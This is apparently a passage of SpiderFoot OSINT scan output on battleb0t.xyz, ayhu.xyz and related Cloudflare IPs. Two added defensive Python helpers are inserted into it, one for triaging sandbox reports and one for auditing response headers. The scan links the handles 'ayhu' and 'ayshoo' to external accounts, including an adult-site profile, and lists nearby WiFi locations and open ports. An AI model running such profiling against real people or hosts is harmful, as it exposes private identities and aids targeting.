u'type': 2, u'description': u'Potential IP "188.114.96.1" found in string "http://188.114.96.1/"\n Potential IP "188.114.96.1" found in string "http://188.114.96.1"\n "188.114.96.1"\n Potential IP "188.114.96.1" found in string "GET / HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: 
188.114.96.1\nDNT: 1\nConnection: Keep-Alive"'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-22', u'name': u'Uses a User Agent typical for browsers, although no browser was ever launched', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 1, u'type': 7, u'description': u'Found user agent(s): Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'}], u'threat_level': 0, u'size': None, u'job_id': u'631a665717ba8f2f707e8915', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [{u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'suspicious_identifiers': [], u'attck_id': u'T1573', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'Encrypted Channel', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}], u'certificates': [], u'hosts': [u'188.114.96.1', u'104.18.31.78'], u'sha256': u'5d930bb75d728b31880a4b3fe975a343b4dfd7855f2a943ba94d6c5bb93a8cfa', u'sha512': u'eb35604cd28c8ce0c80d4c981d47a2cb14198c86708d81ff18d682cb3c8f73b6c54a53fb994dfc82e409c43bf662e908899d1a428a9dc656f1068281ac1049e1', u'image_file_characteristics': [], u'submissions': [{u'url': u'http://188.114.96.1/', u'submission_id': u'631a665717ba8f2f707e8916', u'created_at': u'2022-09-08T22:01:59+00:00', u'filename': None}], u'analysis_start_time': u'2022-09-08T22:02:00+00:00', u'tags': [], u'imphash': u'Unknown', u'total_network_connections': 2, u'av_detect': 0, u'machine_learning_models': [], u'total_signatures': 10, u'image_base': None, u'error_origin': None, u'ssdeep': u'Unknown', u'entrypoint_section': None, u'md5': u'0f5534822f97323db2ede42413f1e07d', u'network_mode': u'default', u'processes': [], u'sha1': u'd0e743b56365f07fe0e998a2fe5ecf2c66be6187', 
u'url_analysis': True, u'type': None, u'file_metadata': None, u'dll_characteristics': [], u'vx_family': None, u'environment_description': u'Windows 7 32 bit', u'verdict': u'no specific threat', u'minor_os_version': None, u'domains': [], u'extracted_files': [], u'type_short': []}, {u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 0, u'threat_score': None, u' | 188.114.96.1 |
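The Hybrid Analysis records in the "Raw Data from RIRs" rows above are stored as a Python 2 repr (u'' strings, None instead of null), not JSON, so json.loads rejects them. Below is an added triage helper, not SpiderFoot or Hybrid Analysis code, that parses that format safely with ast.literal_eval and pulls out what an analyst actually wants from a record: the verdict and AV hit count, the signatures at or above "suspicious", the ATT&CK techniques referenced, and the hosts contacted. The embedded SAMPLE_REPORT is a constructed excerpt trimmed from the record for http://188.114.96.1/ above; the field names and values mirror that record, but it is not the complete cell.

```python
import ast
from collections import Counter

# Constructed excerpt modelled on the Hybrid Analysis record above: same keys,
# same Python-2 repr style (u'' strings, None), trimmed to the fields triage needs.
SAMPLE_REPORT = """[{u'submit_name': u'http://188.114.96.1/', u'url_analysis': True,
  u'verdict': u'no specific threat', u'threat_level': 0, u'av_detect': 0,
  u'environment_description': u'Windows 7 32 bit',
  u'hosts': [u'188.114.96.1', u'104.18.31.78'],
  u'signatures': [
    {u'identifier': u'network-1', u'name': u'Contacts server',
     u'threat_level': 0, u'threat_level_human': u'informative', u'attck_id': None, u'relevance': 1},
    {u'identifier': u'string-102', u'name': u'Found decrypted SSL traffic',
     u'threat_level': 0, u'threat_level_human': u'informative', u'attck_id': u'T1573', u'relevance': 3},
    {u'identifier': u'string-14', u'name': u'Found potential IP address in binary/memory',
     u'threat_level': 1, u'threat_level_human': u'suspicious', u'attck_id': None, u'relevance': 3},
    {u'identifier': u'network-22',
     u'name': u'Uses a User Agent typical for browsers, although no browser was ever launched',
     u'threat_level': 1, u'threat_level_human': u'suspicious', u'attck_id': None, u'relevance': 10}]}]"""


def parse_report(text):
    """Parse the Python-repr payload SpiderFoot stores for Hybrid Analysis.

    ast.literal_eval accepts the u'' prefix on Python 3 and evaluates only
    literals, so untrusted scan output cannot run code the way eval() would.
    Returns the list of analysis records (one per sandbox environment).
    """
    data = ast.literal_eval(text)
    if not isinstance(data, list):
        raise ValueError("expected a list of analysis records")
    return data


def triage(record, min_level=1):
    """Summarise one record: signatures at or above min_level, ATT&CK ids, hosts.

    In this schema threat_level is 0 informative, 1 suspicious, 2 malicious;
    flagged signatures are ordered by the sandbox's own relevance score.
    """
    sigs = record.get("signatures") or []
    flagged = sorted(
        (s for s in sigs if (s.get("threat_level") or 0) >= min_level),
        key=lambda s: -(s.get("relevance") or 0),
    )
    return {
        "submit_name": record.get("submit_name"),
        "verdict": record.get("verdict"),
        "av_detect": record.get("av_detect"),
        "counts": dict(Counter(s.get("threat_level_human") for s in sigs)),
        "flagged": [(s["identifier"], s["name"], s.get("relevance")) for s in flagged],
        "attck_ids": sorted({s["attck_id"] for s in sigs if s.get("attck_id")}),
        "hosts": list(record.get("hosts") or []),
    }


if __name__ == "__main__":
    for rec in parse_report(SAMPLE_REPORT):
        summary = triage(rec)
        print(summary["submit_name"], summary["verdict"], summary["counts"])
        for ident, name, relevance in summary["flagged"]:
            print("  ", ident, relevance, name)
```

Read the output with the run type in mind: this record is a URL analysis (url_analysis is True) in a Windows 7 sandbox, so the two "suspicious" hits, an Internet Explorer user agent and the submitted IP appearing in memory, are produced by the sandbox's own iexplore.exe fetching http://188.114.96.1/ and are not by themselves evidence of anything hostile; the verdict "no specific threat" with 0/88 AV detections is the more useful signal, and the T1573 tag only records that TLS traffic to 104.18.31.78 was decrypted.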
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Baha T|z|ner (Net ID: 00:19:C6:DD:81:11) | 40.2024, 29.0398 |
| 2023-05-12 03:01:37 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.141): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:27:00 | Web Server | No | Web Server Identifier | 0 | 0 | 5 | 0 | None | cloudflare | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "cf-cache-status": "MISS", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "etag": "W/\"8c335e8962efa39b56919d96c0b5527b\"", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=sZlRfK%2B18hvKHsoLJ40BkYB4lHX60aBHph6G1vTBEuSHhMJnpf00BL3raGeVno%2B26HQG4%2BW6ctKHKalYOpr00wtWKpk2uf4%2BwHegHXg02iluCPfF38%2B%2FPJX8%2B4PjVD4UW5HjHU9e\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=14400, must-revalidate", "date": "Fri, 12 May 2023 02:54:19 GMT", "access-control-allow-origin": "*", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "application/javascript", "cf-ray": "7c5f605affff189d-EWR"} |
| 2023-05-12 02:44:05 | SSL Certificate - Issued to | No | CertSpotter | 1 | 0 | 1 | 0 | None | CN=fluid.battleb0t.xyz | battleb0t.xyz |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | Bandlab (Category: music)
https://www.bandlab.com/ayhu | ayhu |
| 2023-05-12 03:17:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | XVIDEOS-profiles (Category: XXXPORNXXX)
https://www.xvideos.com/profiles/ayshoo | ayshoo |
| 2023-05-12 03:09:05 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 2 | 0 | None | 87.248.157.112 | 87.248.157.102 |
| 2023-05-12 03:23:17 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.4:8080 | 188.114.96.0/24 |
| 2023-05-12 03:13:03 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [0000cap.github.io]
https://www.openphish.com/feed.txt | 0000cap.github.io |
| 2023-05-12 02:44:05 | SSL Certificate - Issued to | No | CertSpotter | 0 | 0 | 1 | 0 | None | CN=fluid.battleb0t.xyz | battleb0t.xyz |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | n83d (Net ID: 00:06:25:86:4F:31) | 33.336199,-111.89446440830702 |
| 2023-05-12 02:53:33 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'http://mailvu.co.uk/e/vpNNjoK', u'signatures': [{u'category': u'General', u'origin': u'Loaded Module', u'identifier': u'module-11', u'name': u'Loaded modules', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1574/002', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-641', u'attck_id': u'T1574.002', u'relevance': 0, u'threat_level': 0, u'type': 10, u'description': u'"iexplore.exe" loaded module "%WINDIR%\\System32\\kernel32.dll" at 76B90000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\sechost.dll" at 75170000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\rpcrt4.dll" at 75B00000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\iertutil.dll" at 756F0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\api-ms-win-downlevel-version-l1-1-0.dll" at 750A0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\version.dll" at 743A0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\api-ms-win-downlevel-user32-l1-1-0.dll" at 74E50000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\user32.dll" at 75220000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\gdi32.dll" at 755F0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\lpk.dll" at 770B0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\usp10.dll" at 75D00000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\api-ms-win-downlevel-normaliz-l1-1-0.dll" at 74EB0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\normaliz.dll" at 77080000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\api-ms-win-downlevel-shlwapi-l1-1-0.dll" at 77070000\n "iexplore.exe" loaded module 
"%WINDIR%\\System32\\shlwapi.dll" at 75CA0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\imm32.dll" at 00280000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\imm32.dll" at 75150000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\msctf.dll" at 752F0000\n "iexplore.exe" loaded module "%WINDIR%\\Temp\\VxOle32.dll" at 6D020000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\ole32.dll" at 75490000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\oleaut32.dll" at 753F0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\api-ms-win-downlevel-shell32-l1-1-0.dll" at 71F80000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\shell32.dll" at 75F40000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\comdlg32.dll" at 75A80000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\rpcss.dll" at 02250000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\uxtheme.dll" at 73830000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\winhttp.dll" at 70530000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\webio.dll" at 704E0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\mswsock.dll" at 747F0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\api-ms-win-downlevel-shlwapi-l2-1-0.dll" at 6E7F0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\wship6.dll" at 747E0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\IPHLPAPI.DLL" at 74380000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\winnsi.dll" at 74370000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\clbcatq.dll" at 75190000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\nlaapi.dll" at 72FE0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\cryptsp.dll" at 74830000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\rsaenh.dll" at 024C0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\rsaenh.dll" at 745C0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\RpcRtRemote.dll" at 74DC0000\n "iexplore.exe" loaded module "%PROGRAMFILES%\\Internet 
Explorer\\ieproxy.dll" at 6D100000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\WSHTCPIP.DLL" at 74280000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\rasadhlp.dll" at 71640000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\FWPUCLNT.DLL" at 72D00000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\crypt32.dll" at 74F70000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\msasn1.dll" at 74E30000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\oleacc.dll" at 6CC00000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\oleaccrc.dll" at 02F80000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\msimg32.dll" at 73880000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\setupapi.dll" at 75DA0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\cfgmgr32.dll" at 750B0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\devobj.dll" at 750F0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\KernelBase.dll" at 74E60000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\msvcrt.dll" at 770C0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\api-ms-win-downlevel-advapi32-l1-1-0.dll" at 750E0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\advapi32.dll" at 75640000\n "iexplore.exe" loaded module "%WINDIR%\\Temp\\VxSSL32.dll" at 6CFD0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\ws2_32.dll" at 75C60000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\nsi.dll" at 77090000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\fltLib.dll" at 71650000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\api-ms-win-core-synch-l1-2-0.dll" at 72590000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\sspicli.dll" at 74CB0000\n "iexplore.exe" loaded module "%WINDIR%\\Globalization\\Sorting\\SortDefault.nls" at 01880000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\cryptbase.dll" at 74D20000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\ieframe.dll" at 6BC00000\n "iexplore.exe" loaded module 
"%WINDIR%\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d\\comctl32.dll" at 73C20000\n "iexplore.exe" loaded module "%WINDIR%\\WindowsShell.Manifest" at 02230000\n "iexplore.exe" loaded module "%PROGRAMFILES%\\Internet Explorer\\IEShims.dll" at 6CF80000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\urlmon.dll" at 75930000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\api-ms-win-downlevel-ole32-l1-1-0.dll" at 75140000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\wininet.dll" at 76C70000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\userenv.dll" at 74EC0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\profapi.dll" at 74E40000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\dwmapi.dll" at 738B0000\n "iexplore.exe" loaded module "%PROGRAMFILES%\\Internet Explorer\\sqmapi.dll" at 717E0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\secur32.dll" at 74B50000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\api-ms-win-downlevel-advapi32-l2-1-0.dll" at 71620000\n "iexplore.exe" loaded module "%LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files\\counters.dat" at 02260000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\netprofm.dll" at 6E8F0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\npmproxy.dll" at 6DEF0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\netapi32.dll" at 73370000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\netutils.dll" at 742D0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\srvcli.dll" at 74A20000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\wkscli.dll" at 74190000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\wshqos.dll" at 705B0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\credssp.dll" at 744F0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\schannel.dll" at 74630000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\ncrypt.dll" at 74960000\n "iexplore.exe" loaded module 
"%WINDIR%\\System32\\bcrypt.dll" at 74940000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\bcryptprimitives.dll" at 74500000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\wintrust.dll" at 75110000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\dnsapi.dll" at 746B0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\gpapi.dll" at 74400000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\apphelp.dll" at 74CD0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\ieui.dll" at 6CF00000\n "iexplore.exe" loaded module "%WINDIR%\\Fonts\\StaticCache.dat" at 03A20000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\en-US\\user32.dll.mui" at 02A50000\n "iexplore.exe" loaded module "%LOCALAPPDATA%\\ow\\Microsoft\\Internet Explorer\\Services\\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico" at 02D00000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\WindowsCodecs.dll" at 73460000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\ExplorerFrame.dll" at 70A20000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\duser.dll" at 73910000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\dui70.dll" at 735D0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\en-US\\msctf.dll.mui" at 04550000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\dhcpcsvc6.dll" at 72CE0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\dhcpcsvc.dll" at 74290000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\mlang.dll" at 6FFA0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\propsys.dll" at 73A30000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\ntmarta.dll" at 74340000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\Wldap32.dll" at 75BB0000\n "iexplore.exe" loaded module "%LOCALAPPDATA%\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000030.db" at 046C0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\Macromed\\Flash\\Flash32_27_0_0_187.ocx" at 65CE0000\n "iexplore.exe" loaded module 
"%WINDIR%\\System32\\Macromed\\Flash\\Flash32_27_0_0_187.ocx" at 64890000\n "iexplore.exe" loaded module "%ALLUSERSPROFILE%\\Microsoft\\Windows\\Caches\\cversions.2.db" at 045B0000\n "iexplore.exe" loaded module "%ALLUSERSPROFILE%\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000016.db" at 046F0000\n "iexplore.exe" loaded module "%ALLUSERSPROFILE%\\Microsoft\\Wind | 185.199.109.153 |
| 2023-05-12 03:00:56 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 00tau.github.io | 185.199.111.153 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | referrer-policy: same-origin | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=u1lyJPU0WioZJ7gW30pw%2F1QYGnEvSi6VguD4iZQLy9JFxNjUYX7Kn2AvbK1RwFeWf6Bc3GtzenDe9QfSS82xeo%2BaVIIeURcDQSNP2UoyOSj%2Fo0e2kf0IgvowllGBeio%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:22 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f60715ea2423d-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:32:00 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.1:8080 | 188.114.97.0/24 |
| 2023-05-12 03:03:32 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 007jedgar.github.io |
| 2023-05-12 02:53:22 | IP Address | No | Mnemonic PassiveDNS | 0 | 0 | 2 | 0 | None | 172.67.168.252 | nwapi2.battleb0t.xyz |
| 2023-05-12 02:54:20 | HTTP Status Code | No | Web Spider | 0 | 1 | 2 | 0 | None | 521 | nuke.battleb0t.xyz |
| 2023-05-12 03:27:00 | Web Technology | No | Web Server Identifier | 0 | 0 | 3 | 0 | None | Express | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "x-powered-by": "Express", "transfer-encoding": "chunked", "cf-cache-status": "DYNAMIC", "content-encoding": "gzip", "server": "cloudflare", "last-modified": "Tue, 01 Jan 1980 00:00:01 GMT", "connection": "keep-alive", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=lshBmhR4GSBYjKDefqIGkygGexG96Rixvbfv4WfP5q9iY7bD%2BJ8d%2FnJqoPqz7%2FLjDZIRQ0jW5G%2BSrG0ejdUc3LLQdFd%2BIoXwZdUdzxFXOZIrwBisdLoxnDYZ09vi9PExVEvG%2FnDtTw%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=0", "date": "Fri, 12 May 2023 02:54:15 GMT", "cf-ray": "7c5f6041aa868cdc-EWR", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "content-type": "text/html; charset=UTF-8"} |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | SX55155D43E (Net ID: 00:01:E3:55:D4:3E) | 52.3759, 4.8975 |
| 2023-05-12 02:55:05 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 403 Forbidden
Date: <REDACTED>
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 7c5acc457cc32d9a-ORD
Content-Encoding: gzip
| 188.114.97.1 |
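The response headers in this table arrive in two shapes: the JSON dict the Web Server Identifier module stores (the cloudflare and Express rows above) and the raw banner text from Censys (the 403 just above). Note that the "Non-Standard HTTP Header" row flags referrer-policy, which is a standard header, so SpiderFoot's own notion of "strange" is not a security checklist. Below is an added audit helper, written for this page and not part of SpiderFoot, that parses both shapes and reports which hardening headers are absent and which present values are weak (wildcard CORS, X-Powered-By disclosure, referrer policies that leak full URLs). It also flags responses that Cloudflare answered from the edge: the cf-mitigated: challenge header in one dict above, and 403 pages like the banner, describe Cloudflare's interstitial, not the origin's configuration, so "missing" headers on those must not be attributed to the origin. The edge-page heuristic is an assumption of this example, and the two inputs are constructed copies of the rows above.

```python
import json

# Hardening headers a practitioner expects on an HTML/JS response (checked in this order).
EXPECTED = (
    "strict-transport-security",
    "content-security-policy",
    "x-content-type-options",
    "x-frame-options",
    "referrer-policy",
    "permissions-policy",
)
# Referrer policies that send the full URL to other origins.
WEAK_REFERRER = {"unsafe-url", "no-referrer-when-downgrade"}

# Constructed copies of rows above: the JSON header dict from the cloudflare
# "Web Server" row, and the raw 403 banner from the Censys row.
HEADER_JSON = r'''{"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}",
 "x-content-type-options": "nosniff", "content-encoding": "gzip", "cf-cache-status": "MISS",
 "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive",
 "cache-control": "public, max-age=14400, must-revalidate", "date": "Fri, 12 May 2023 02:54:19 GMT",
 "access-control-allow-origin": "*", "referrer-policy": "strict-origin-when-cross-origin",
 "content-type": "application/javascript", "cf-ray": "7c5f605affff189d-EWR"}'''

RAW_BANNER = """HTTP/1.1 403 Forbidden
Date: <REDACTED>
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 7c5acc457cc32d9a-ORD
Content-Encoding: gzip
"""


def headers_from_json(text):
    """Load the header dict SpiderFoot's Web Server Identifier stores, lower-casing names."""
    return {k.lower(): v for k, v in json.loads(text).items()}


def parse_banner(text):
    """Parse a raw HTTP response banner into (status_code, headers).

    Header names are lower-cased; repeated headers are joined with ', '.
    Parsing stops at the first blank line, so any body is ignored.
    """
    lines = text.splitlines()
    status = int(lines[0].split()[1])
    headers = {}
    for line in lines[1:]:
        if not line.strip():
            break
        name, _, value = line.partition(":")
        name, value = name.strip().lower(), value.strip()
        headers[name] = f"{headers[name]}, {value}" if name in headers else value
    return status, headers


def audit(headers, status=None):
    """Return missing hardening headers, weak present values, and an edge-page flag."""
    missing = [h for h in EXPECTED if h not in headers]
    weak = []
    if headers.get("access-control-allow-origin") == "*":
        weak.append("access-control-allow-origin is *: fine for public static assets, not for authenticated APIs")
    if "x-powered-by" in headers:
        weak.append(f"x-powered-by discloses {headers['x-powered-by']}")
    if headers.get("referrer-policy", "").lower() in WEAK_REFERRER:
        weak.append(f"referrer-policy {headers['referrer-policy']} sends full URLs cross-origin")
    # Assumption (heuristic): cf-mitigated, or a 403 with Server: cloudflare and no
    # cf-cache-status, means Cloudflare answered from the edge. The headers then
    # describe Cloudflare's challenge/block page rather than the origin.
    edge_page = "cf-mitigated" in headers or (
        status == 403 and headers.get("server") == "cloudflare" and "cf-cache-status" not in headers
    )
    return {"missing": missing, "weak": weak, "edge_page": edge_page}


if __name__ == "__main__":
    print("JSON row:", audit(headers_from_json(HEADER_JSON)))
    code, hdrs = parse_banner(RAW_BANNER)
    print("banner row:", code, audit(hdrs, status=code))
```

For the JSON row the result is a JavaScript asset served with nosniff and a sane referrer policy but no HSTS, CSP, or framing controls, plus a wildcard CORS origin that is harmless only because the response is a public static file. For the 403 banner the audit reports the same kind of gaps, but edge_page is set, so the right conclusion is "Cloudflare blocked the scanner", not "the origin lacks HSTS"; a follow-up request with a browser-like client, or the origin's IP if it is exposed, is needed before any finding is written up.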
| 2023-05-12 02:44:09 | SSL Certificate - Raw Data | No | CertSpotter | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
0c:e3:f4:1c:e8:cb:bb:cf:13:f7:6c:6f:36:5e:c2:eb
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Google Trust Services LLC, CN=GTS CA 1P5
Validity
Not Before: Feb 11 05:22:10 2023 GMT
Not After : May 12 05:22:09 2023 GMT
Subject: CN=*.ayhu.xyz
Subject Public Key Info:
